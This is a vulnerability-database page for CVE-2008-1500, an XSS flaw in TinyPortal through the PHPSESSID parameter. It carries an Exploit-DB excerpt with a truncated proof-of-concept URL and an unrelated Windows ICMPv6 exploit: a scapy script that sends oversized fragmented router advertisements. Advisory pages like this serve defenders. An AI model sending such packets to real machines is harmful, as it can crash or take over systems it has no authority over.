CVE-2008-1500
published 2008-03-25CVE-2008-1500: Cross-site scripting (XSS) vulnerability in index.php in TinyPortal 0.8.6 and 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.20%
64.2th percentile
Cross-site scripting (XSS) vulnerability in index.php in TinyPortal 0.8.6 and 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tinyportal | tinyportal | — | — |
| tinyportal | tinyportal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution
exploitdb·2010-02-09
CVE-2010-0239 Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution
Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution
---
source: https://www.securityfocus.com/bid/38061/info
Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
v6_dst = ""
mac_dst = ""
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)
l=fragment6(pkt, 1500)
for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")
Exploit-DB
TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting
exploitdb·2008-03-22
CVE-2008-1500 TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting
TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28402/info
TinyPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?PHPSESSID=">
No writeups or analysis indexed.
2008-03-25
Published